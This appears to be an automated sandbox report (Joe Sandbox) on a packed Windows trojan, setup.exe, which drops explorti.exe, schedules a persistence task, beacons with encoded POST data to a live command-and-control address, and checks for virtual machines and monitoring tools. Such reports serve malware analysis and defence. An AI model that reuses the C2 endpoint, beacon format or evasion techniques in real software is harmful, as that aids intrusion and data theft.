Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 10_2_002BBD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001756000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php

System Summary

Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: setup.exe Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: explorti.exe.0.dr Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setup.exe ReversingLabs: Detection: 62%
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: setup.exe Static file information: File size 1971200 > 1048576
Source: setup.exe Static PE information: Raw size of rylhmesc is bigger than: 0x100000 < 0x1afc00

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 3.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 10.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b
Source: setup.exe Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: rylhmesc
Source: setup.exe Static PE information: section name: ofvhckac
Source: setup.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: rylhmesc
Source: explorti.exe.0.dr Static PE information: section name: ofvhckac
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 10_2_002CD84C push ecx; ret 10_2_002CD85F
Source: setup.exe Static PE information: section name: entropy: 7.983148121720557
Source: setup.exe Static PE information: section name: rylhmesc entropy: 7.952696111098041
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.983148121720557
Source: explorti.exe.0.dr Static PE information: section name: rylhmesc entropy: 7.952696111098041
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B268 second address: E2B270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B270 second address: E2B27C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B27C second address: E2B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B280 second address: E2B292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B3EE second address: E2B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B3F9 second address: E2B41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 js 00007FF32CDD6572h 0x00000016 jl 00007FF32CDD656Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B5AC second address: E2B5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2B5B2 second address: E2B5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E1FA6C second address: E1FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BC67 second address: E2BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BC6B second address: E2BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF32CFB71FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BC85 second address: E2BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007FF32CDD6566h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BC98 second address: E2BCA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BF90 second address: E2BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2BF94 second address: E2BFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7205h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2C0F0 second address: E2C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2C0F6 second address: E2C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2DBC9 second address: E2DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2DBCD second address: E2DBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FCh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF32CFB71FDh 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2DBF6 second address: E2DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2DC03 second address: E2DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2DC09 second address: E2DC0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E30CC1 second address: E30CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E30CC5 second address: E30CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2F679 second address: E2F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2F67E second address: E2F684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E2F684 second address: E2F688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E31055 second address: E3105B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E34166 second address: E3416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E37A5B second address: E37A98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FF32CDD6566h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF32CDD6577h 0x00000014 jmp 00007FF32CDD656Fh 0x00000019 js 00007FF32CDD656Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E37DCD second address: E37DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E37DD1 second address: E37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E37DE1 second address: E37DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E37DE7 second address: E37DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E380C3 second address: E380C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3838D second address: E38391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E38391 second address: E3839F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E39C32 second address: E39C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
